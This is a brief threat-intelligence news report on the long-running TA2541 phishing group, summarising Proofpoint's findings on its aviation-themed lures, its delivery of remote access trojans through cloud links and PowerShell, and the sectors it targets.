Researchers have observed a hacker group, named TA2541, that stayed hidden for many years without making any major changes in its tactics. This mysterious group has been carrying out phishing and malware attacks since 2017.

About TA2541 and its campaigns

According to researchers at Proofpoint, hackers have been using the same tactics, including remotely controlling the victim machines, performing reconnaissance, and stealing important data, since its inception.
  • The attacks start with phishing emails containing relevant information regarding individuals and businesses being targeted, using themes related to transportation, aviation, and aerospace sectors.
  • In one case, the attackers used COVID-19-themed lures, but these weren't highly customized. 
  • Attackers sent these in large numbers with an implied urgency to fool victims into downloading malware. All of the messages were always in English.

Use of multiple RATs 

Initially, the TA2541 group sent emails with macro-laden Word attachments to download a RAT payload. However, it recently started using OneDrive and Google Drive URLs.
  • The URLs lead to an obfuscated VBS file. Once executed, PowerShell downloads RATs onto Windows systems. 
  • The group spread dozens of different malware payloads since the campaigns started, all of which were for sale on dark web forums or available in open-source repositories.  
  • The most delivered RAT in TA2541 campaigns include AsyncRAT, followed by Parallax, NetWire, and WSH RAT; these were used to gain remote control of machines and steal data.

Targeted victims and regions

The group has targeted hundreds of organizations in multiple regions such as Europe, the Middle East, and North America. It targeted aviation, transportation, defense, manufacturing, and aerospace industries.


The TA2541 group stayed hidden for almost five years, exhibiting its sophisticated evasion skills. The campaigns are still active and spreading phishing emails to target victims around the world.
Cyware Publisher